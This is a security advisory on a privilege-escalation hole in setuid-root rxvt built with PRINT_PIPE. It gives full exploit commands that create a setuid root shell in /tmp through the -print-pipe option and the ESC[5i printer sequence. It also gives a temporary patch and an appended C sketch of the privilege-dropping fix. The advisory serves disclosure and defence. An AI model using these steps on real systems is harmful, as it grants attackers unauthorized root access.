There is a major security hole in rxvt, a terminal emulator for X, when it is installed suid root, as many configurations require in order to write to the utmp file. It is obvious from the code that this program was not written to be run suid root; it is a pity that the sysadmins who install pre-compiled versions of this sort of code never see the "run suid root at your own risk" warning in the makefile that the people who put the distribution together do.

The conditions that allow this particular hole to be exploited are rxvt compiled with the PRINT_PIPE option and running suid root. The program sets the printer pipe to "lpr" without a pathname (so the command is found through the user's PATH), but it is even easier than that: we can set the pipe to whatever we want with the -print-pipe option on the rxvt command line. Although the program gives up its root privileges when forking to run a shell or other command, the original process keeps running suid root for the whole execution of the program. Because the popen() call runs as root, whatever command that pipe opens executes immediately as root. The vt100 printer-on sequence, ESC[5i, starts the printer pipe; the printer-off sequence, ESC[4i, closes it. Exploiting this is extremely easy.

Program: rxvt
Affected Operating Systems: Linux Slackware 3.0, RedHat 2.1, others with rxvt suid root (and compiled with PRINT_PIPE)
Requirements: account on system, X server
Temporary Patch: chmod -s /usr/X11R6/bin/rxvt (rxvt will then no longer be able to update utmp)
Security Compromise: root
Author: Dave M. (davem@cmu.edu)
Synopsis: rxvt fails to give up root privileges before opening a pipe to a program that can be specified by the user.

Exploit:

1. Set the DISPLAY environment variable if necessary so you can use X clients.

2. In user shell:

   $ echo 'cp /bin/sh /tmp/rxsh;chmod 4755 /tmp/rxsh' > /tmp/rxbug
   $ chmod +x /tmp/rxbug
   $ rxvt -print-pipe /tmp/rxbug

3. In the rxvt X client, run cat and type the printer-on and printer-off sequences (ESC is the escape character, byte 0x1b):

   $ cat
   ESC[5i
   ESC[4i

   (The client will close at this point with a broken pipe, since /tmp/rxbug never reads its input.)

4. Back in the user shell:

   $ /tmp/rxsh
   # whoami
   root
   #
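The synopsis names the fix: drop root before the pipe is opened, and do not let a setuid binary take the pipe command from its own command line. The following C sketch is an added example, not code from rxvt or from the advisory's author, of how a setuid program should handle a user-selectable print pipe: it ignores a -print-pipe override when the real and effective uids differ, and replaces popen() with a fork that drops privileges in the child before exec. The DEFAULT_PRINT_PIPE path, the function names and the `id -u` check command are assumptions made for this illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Assumed default for this illustration: an absolute path, not the bare
 * "lpr" that rxvt used, so PATH cannot redirect the printer command. */
#define DEFAULT_PRINT_PIPE "/usr/bin/lpr"

/* Decide which print-pipe command to honour. When the process is setuid
 * (real uid differs from effective uid) argv is attacker-controlled, so a
 * -print-pipe override must be ignored in favour of the compiled-in default. */
const char *choose_print_pipe(const char *user_arg, uid_t ruid, uid_t euid)
{
    if (user_arg == NULL || user_arg[0] == '\0')
        return DEFAULT_PRINT_PIPE;
    if (ruid != euid)
        return DEFAULT_PRINT_PIPE;
    return user_arg;
}

/* Permanently drop to the real uid/gid. gid first: once the uid is gone we
 * could no longer change the gid. Every call is checked and the result is
 * verified, because a silently failed drop would run the pipe as root. */
int drop_privileges(void)
{
    uid_t ruid = getuid();
    gid_t rgid = getgid();

    if (setgid(rgid) != 0) return -1;
    if (setuid(ruid) != 0) return -1;
    if (geteuid() != ruid || getegid() != rgid) return -1;
    /* If we were root, regaining it must now be impossible. */
    if (ruid != 0 && setuid(0) == 0) return -1;
    return 0;
}

/* popen(cmd, "w") replacement: the child drops privileges before exec, so the
 * command never runs with the parent's effective uid. Returns the write end
 * of the pipe, or NULL; the child's pid is stored in *child for the close. */
FILE *popen_unprivileged(const char *cmd, pid_t *child)
{
    int fds[2];
    pid_t pid;

    if (pipe(fds) != 0) return NULL;
    pid = fork();
    if (pid < 0) { close(fds[0]); close(fds[1]); return NULL; }
    if (pid == 0) {
        close(fds[1]);
        if (dup2(fds[0], STDIN_FILENO) < 0) _exit(127);
        close(fds[0]);
        if (drop_privileges() != 0) _exit(127);   /* refuse to run as root */
        execl("/bin/sh", "sh", "-c", cmd, (char *)NULL);
        _exit(127);
    }
    close(fds[0]);
    *child = pid;
    return fdopen(fds[1], "w");
}

/* Close the pipe and return the command's exit status, or -1. */
int pclose_unprivileged(FILE *fp, pid_t child)
{
    int status;
    fclose(fp);
    if (waitpid(child, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Check which uid the pipe command really runs as: exit status 0 means the
 * command saw `id -u` equal to the given uid. (Assumes /bin/sh and id exist.) */
int pipe_runs_as_uid(uid_t uid)
{
    char cmd[64];
    pid_t child;
    FILE *fp;

    snprintf(cmd, sizeof cmd, "[ \"$(id -u)\" = \"%lu\" ]", (unsigned long)uid);
    fp = popen_unprivileged(cmd, &child);
    if (fp == NULL) return -1;
    return pclose_unprivileged(fp, child);
}

int main(int argc, char **argv)
{
    /* The advisory's attack: argv supplies /tmp/rxbug to a setuid root binary. */
    const char *arg = argc > 1 ? argv[1] : "/tmp/rxbug";
    const char *cmd = choose_print_pipe(arg, getuid(), geteuid());
    printf("print pipe honoured: %s\n", cmd);
    printf("pipe runs as real uid: %s\n",
           pipe_runs_as_uid(getuid()) == 0 ? "yes" : "no");
    return 0;
}
```

Run unprivileged, the pipe command is honoured and runs as the invoking user; installed setuid root, choose_print_pipe() discards /tmp/rxbug and the child still executes as the real uid, so the ESC[5i trick would at most print to the default command with the user's own privileges.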